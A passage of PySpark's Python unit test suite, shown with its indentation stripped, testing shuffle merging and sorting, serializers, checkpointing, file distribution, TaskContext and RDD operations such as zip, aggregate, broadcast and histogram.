from py4j.protocol import Py4JJavaError
try:
import xmlrunner
except ImportError:
xmlrunner = None
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
if sys.version_info[0] >= 3:
xrange = range
basestring = str
if sys.version >= "3":
from io import StringIO
else:
from StringIO import StringIO
from pyspark import keyword_only
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.rdd import RDD
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer, CompressedSerializer, UTF8Deserializer, NoOpSerializer, \
PairDeserializer, CartesianDeserializer, AutoBatchedSerializer, AutoSerializer, \
FlattenedValuesSerializer
from pyspark.shuffle import Aggregator, ExternalMerger, ExternalSorter
from pyspark import shuffle
from pyspark.profiler import BasicProfiler
from pyspark.taskcontext import TaskContext
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class MergerTests(unittest.TestCase):
def setUp(self):
self.N = 1 << 12
self.l = [i for i in xrange(self.N)]
self.data = list(zip(self.l, self.l))
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda x_y1: (x_y1[0], [x_y1[1]]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 20)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda x_y2: (x_y2[0], [x_y2[1]]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 5, partitions=3)
m.mergeCombiners(map(lambda k_v: (k_v[0], [str(k_v[1])]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m.items()),
self.N * 10)
m._cleanup()
def test_group_by_key(self):
def gen_data(N, step):
for i in range(1, N + 1, step):
for j in range(i):
yield (i, [j])
def gen_gs(N, step=1):
return shuffle.GroupByKey(gen_data(N, step))
self.assertEqual(1, len(list(gen_gs(1))))
self.assertEqual(2, len(list(gen_gs(2))))
self.assertEqual(100, len(list(gen_gs(100))))
self.assertEqual(list(range(1, 101)), [k for k, _ in gen_gs(100)])
self.assertTrue(all(list(range(k)) == list(vs) for k, vs in gen_gs(100)))
for k, vs in gen_gs(50002, 10000):
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
ser = PickleSerializer()
l = ser.loads(ser.dumps(list(gen_gs(50002, 30000))))
for k, vs in l:
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
class SorterTests(unittest.TestCase):
def test_in_memory_sort(self):
l = list(range(1024))
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
class CustomizedSorter(ExternalSorter):
def _next_limit(self):
return self.memory_limit
l = list(range(1024))
random.shuffle(l)
sorter = CustomizedSorter(1)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = list(range(10240))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from pickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEqual(p1, p2)
from pyspark.cloudpickle import dumps
P2 = loads(dumps(P))
p3 = P2(1, 3)
self.assertEqual(p1, p3)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_function_module_name(self):
ser = CloudPickleSerializer()
func = lambda x: x
func2 = ser.loads(ser.dumps(func))
self.assertEqual(func.__module__, func2.__module__)
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
# to be corrected with SPARK-11160
if not xmlrunner:
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEqual(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.__code__.co_names)
ser.dumps(foo)
def test_compressed_serializer(self):
ser = CompressedSerializer(PickleSerializer())
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
io = StringIO()
ser.dump_stream(["abc", u"123", range(5)], io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)], list(ser.load_stream(io)))
ser.dump_stream(range(1000), io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)] + list(range(1000)), list(ser.load_stream(io)))
io.close()
def test_hash_serializer(self):
hash(NoOpSerializer())
hash(UTF8Deserializer())
hash(PickleSerializer())
hash(MarshalSerializer())
hash(AutoSerializer())
hash(BatchedSerializer(PickleSerializer()))
hash(AutoBatchedSerializer(MarshalSerializer()))
hash(PairDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CartesianDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CompressedSerializer(PickleSerializer()))
hash(FlattenedValuesSerializer(PickleSerializer()))
class QuietTest(object):
def __init__(self, sc):
self.log4j = sc._jvm.org.apache.log4j
def __enter__(self):
self.old_level = self.log4j.LogManager.getRootLogger().getLevel()
self.log4j.LogManager.getRootLogger().setLevel(self.log4j.Level.FATAL)
def __exit__(self, exc_type, exc_val, exc_tb):
self.log4j.LogManager.getRootLogger().setLevel(self.old_level)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class ReusedPySparkTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.sc = SparkContext('local[4]', cls.__name__)
@classmethod
def tearDownClass(cls):
cls.sc.stop()
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEqual([1, 2, 3, 4], recovered.collect())
class LocalCheckpointTests(ReusedPySparkTestCase):
def test_basic_localcheckpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertFalse(flatMappedRDD.isLocallyCheckpointed())
flatMappedRDD.localCheckpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.isLocallyCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
class AddFileTests(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
def func(x):
from userlibrary import UserClass
return UserClass().hello()
with QuietTest(self.sc):
self.assertRaises(Exception, self.sc.parallelize(range(2)).map(func).first)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
def test_add_file_recursively_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello")
self.sc.addFile(path, True)
download_path = SparkFiles.get("hello")
self.assertNotEqual(path, download_path)
with open(download_path + "/hello.txt") as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
with open(download_path + "/sub_hello/sub_hello.txt") as test_file:
self.assertEqual("Sub Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1.zip")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class TaskContextTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
# Allow retries even though they are normally disabled in local mode
self.sc = SparkContext('local[4, 2]', class_name)
def test_stage_id(self):
"""Test the stage ids are available and incrementing as expected."""
rdd = self.sc.parallelize(range(10))
stage1 = rdd.map(lambda x: TaskContext.get().stageId()).take(1)[0]
stage2 = rdd.map(lambda x: TaskContext.get().stageId()).take(1)[0]
# Test using the constructor directly rather than the get()
stage3 = rdd.map(lambda x: TaskContext().stageId()).take(1)[0]
self.assertEqual(stage1 + 1, stage2)
self.assertEqual(stage1 + 2, stage3)
self.assertEqual(stage2 + 1, stage3)
def test_partition_id(self):
"""Test the partition id."""
rdd1 = self.sc.parallelize(range(10), 1)
rdd2 = self.sc.parallelize(range(10), 2)
pids1 = rdd1.map(lambda x: TaskContext.get().partitionId()).collect()
pids2 = rdd2.map(lambda x: TaskContext.get().partitionId()).collect()
self.assertEqual(0, pids1[0])
self.assertEqual(0, pids1[9])
self.assertEqual(0, pids2[0])
self.assertEqual(1, pids2[9])
def test_attempt_number(self):
"""Verify the attempt numbers are correctly reported."""
rdd = self.sc.parallelize(range(10))
# Verify a simple job with no failures
attempt_numbers = rdd.map(lambda x: TaskContext.get().attemptNumber()).collect()
map(lambda attempt: self.assertEqual(0, attempt), attempt_numbers)
def fail_on_first(x):
"""Fail on the first attempt so we get a positive attempt number"""
tc = TaskContext.get()
attempt_number = tc.attemptNumber()
partition_id = tc.partitionId()
attempt_id = tc.taskAttemptId()
if attempt_number == 0 and partition_id == 0:
raise Exception("Failing on first attempt")
else:
return [x, partition_id, attempt_number, attempt_id]
result = rdd.map(fail_on_first).collect()
# We should re-submit the first partition to it but other partitions should be attempt 0
self.assertEqual([0, 0, 1], result[0][0:3])
self.assertEqual([9, 3, 0], result[9][0:3])
first_partition = filter(lambda x: x[1] == 0, result)
map(lambda x: self.assertEqual(1, x[2]), first_partition)
other_partitions = filter(lambda x: x[1] != 0, result)
map(lambda x: self.assertEqual(0, x[2]), other_partitions)
# The task attempt id should be different
self.assertTrue(result[0][3] != result[9][3])
def test_tc_on_driver(self):
"""Verify that getting the TaskContext on the driver returns None."""
tc = TaskContext.get()
self.assertTrue(tc is None)
class RDDTests(ReusedPySparkTestCase):
def test_range(self):
self.assertEqual(self.sc.range(1, 1).count(), 0)
self.assertEqual(self.sc.range(1, 0, -1).count(), 1)
self.assertEqual(self.sc.range(0, 1 << 40, 1 << 39).count(), 2)
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_empty_rdd(self):
rdd = self.sc.emptyRDD()
self.assertTrue(rdd.isEmpty())
def test_sum(self):
self.assertEqual(0, self.sc.emptyRDD().sum())
self.assertEqual(6, self.sc.parallelize([1, 2, 3]).sum())
def test_to_localiterator(self):
from time import sleep
rdd = self.sc.parallelize([1, 2, 3])
it = rdd.toLocalIterator()
sleep(5)
self.assertEqual([1, 2, 3], sorted(it))
rdd2 = rdd.repartition(1000)
it2 = rdd2.toLocalIterator()
sleep(5)
self.assertEqual([1, 2, 3], sorted(it2))
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode("utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode('utf8'))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda x_y3: x_y3[0] + x_y3[1]).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize([u"Hello", u"World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual(u"Hello World!", x.strip())
self.assertEqual(u"Hello World!", y.strip())
def test_cartesian_chaining(self):
# Tests for SPARK-16589
rdd = self.sc.parallelize(range(10), 2)
self.assertSetEqual(
set(rdd.cartesian(rdd).cartesian(rdd).collect()),
set([((x, y), z) for x in range(10) for y in range(10) for z in range(10)])
)
self.assertSetEqual(
set(rdd.cartesian(rdd.cartesian(rdd)).collect()),
set([(x, (y, z)) for x in range(10) for y in range(10) for z in range(10)])
)
self.assertSetEqual(
set(rdd.cartesian(rdd.zip(rdd)).collect()),
set([(x, (y, y)) for x in range(10) for y in range(10)])
)
def test_zip_chaining(self):
# Tests for SPARK-21985
rdd = self.sc.parallelize('abc', 2)
self.assertSetEqual(
set(rdd.zip(rdd).zip(rdd).collect()),
set([((x, x), x) for x in 'abc'])
)
self.assertSetEqual(
set(rdd.zip(rdd.zip(rdd)).collect()),
set([(x, (x, x)) for x in 'abc'])
)
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(xrange(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
def test_aggregate_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregate and treeAggregate to build dict
# representing a counter of ints
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
# Show that single or multiple partitions work
data1 = self.sc.range(10, numSlices=1)
data2 = self.sc.range(10, numSlices=2)
def seqOp(x, y):
x[y] += 1
return x
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
counts1 = data1.aggregate(defaultdict(int), seqOp, comboOp)
counts2 = data2.aggregate(defaultdict(int), seqOp, comboOp)
counts3 = data1.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
counts4 = data2.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
ground_truth = defaultdict(int, dict((i, 1) for i in range(10)))
self.assertEqual(counts1, ground_truth)
self.assertEqual(counts2, ground_truth)
self.assertEqual(counts3, ground_truth)
self.assertEqual(counts4, ground_truth)
def test_aggregate_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregateByKey to make a pair RDD that
# contains lists of all values for each key in the original RDD
# list(range(...)) for Python 3.x compatibility (can't use * operator
# on a range object)
# list(zip(...)) for Python 3.x compatibility (want to parallelize a
# collection, not a zip object)
tuples = list(zip(list(range(10))*2, [1]*20))
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def seqOp(x, y):
x.append(y)
return x
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.aggregateByKey([], seqOp, comboOp).collect()
values2 = data2.aggregateByKey([], seqOp, comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
ground_truth = [(i, [1]*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_fold_mutable_zero_value(self):
# Test for SPARK-9021; uses fold to merge an RDD of dict counters into
# a single dict
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
counts1 = defaultdict(int, dict((i, 1) for i in range(10)))
counts2 = defaultdict(int, dict((i, 1) for i in range(3, 8)))
counts3 = defaultdict(int, dict((i, 1) for i in range(4, 7)))
counts4 = defaultdict(int, dict((i, 1) for i in range(5, 6)))
all_counts = [counts1, counts2, counts3, counts4]
# Show that single or multiple partitions work
data1 = self.sc.parallelize(all_counts, 1)
data2 = self.sc.parallelize(all_counts, 2)
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
fold1 = data1.fold(defaultdict(int), comboOp)
fold2 = data2.fold(defaultdict(int), comboOp)
ground_truth = defaultdict(int)
for counts in all_counts:
for key, val in counts.items():
ground_truth[key] += val
self.assertEqual(fold1, ground_truth)
self.assertEqual(fold2, ground_truth)
def test_fold_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses foldByKey to make a pair RDD that contains
# lists of all values for each key in the original RDD
tuples = [(i, range(i)) for i in range(10)]*2
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.foldByKey([], comboOp).collect()
values2 = data2.foldByKey([], comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
# list(range(...)) for Python 3.x compatibility
ground_truth = [(i, list(range(i))*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_aggregate_by_key(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEqual([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 10000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 27MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
def test_unpersist(self):
N = 1000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 3MB
bdata.unpersist()
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
bdata.destroy()
try:
self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
except Exception as e:
pass
else:
raise Exception("job should fail after destroy the broadcast")
def test_multiple_broadcasts(self):
N = 1 << 21
b1 = self.sc.broadcast(set(range(N))) # multiple blocks in JVM
r = list(range(1 << 15))
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
def test_multithread_broadcast_pickle(self):
import threading
b1 = self.sc.broadcast(list(range(3)))
b2 = self.sc.broadcast(list(range(3)))
def f1():
return b1.value
def f2():
return b2.value
funcs_num_pickled = {f1: None, f2: None}
def do_pickle(f, sc):
command = (f, None, sc.serializer, sc.serializer)
ser = CloudPickleSerializer()
ser.dumps(command)
def process_vars(sc):
broadcast_vars = list(sc._pickled_broadcast_vars)
num_pickled = len(broadcast_vars)
sc._pickled_broadcast_vars.clear()
return num_pickled
def run(f, sc):
do_pickle(f, sc)
funcs_num_pickled[f] = process_vars(sc)
# pickle f1, adds b1 to sc._pickled_broadcast_vars in main thread local storage
do_pickle(f1, self.sc)
# run all for f2, should only add/count/clear b2 from worker thread local storage
t = threading.Thread(target=run, args=(f2, self.sc))
t.start()
t.join()
# count number of vars pickled in main thread, only b1 should be counted and cleared
funcs_num_pickled[f1] = process_vars(self.sc)
self.assertEqual(funcs_num_pickled[f1], 1)
self.assertEqual(funcs_num_pickled[f2], 1)
self.assertEqual(len(list(self.sc._pickled_broadcast_vars)), 0)
def test_large_closure(self):
N = 200000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEqual(N, rdd.first())
# regression test for SPARK-6886
self.assertEqual(1, rdd.map(lambda x: (x, 1)).groupByKey().count())
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
# regression test for SPARK-4841
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
t = self.sc.textFile(path)
cnt = t.count()
self.assertEqual(cnt, t.zip(t).count())
rdd = t.map(str)
self.assertEqual(cnt, t.zip(rdd).count())
# regression test for bug in _reserializer()
self.assertEqual(cnt, t.zip(rdd).count())
def test_zip_with_different_object_sizes(self):
# regress test for SPARK-5973
a = self.sc.parallelize(xrange(10000)).map(lambda i: '*' * i)
b = self.sc.parallelize(xrange(10000, 20000)).map(lambda i: '*' * i)
self.assertEqual(10000, a.zip(b).count())
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
with QuietTest(self.sc):
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEqual(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(xrange(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.03) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual([4], rdd.histogram([0, 10])[1])
self.assertEqual([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEqual([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
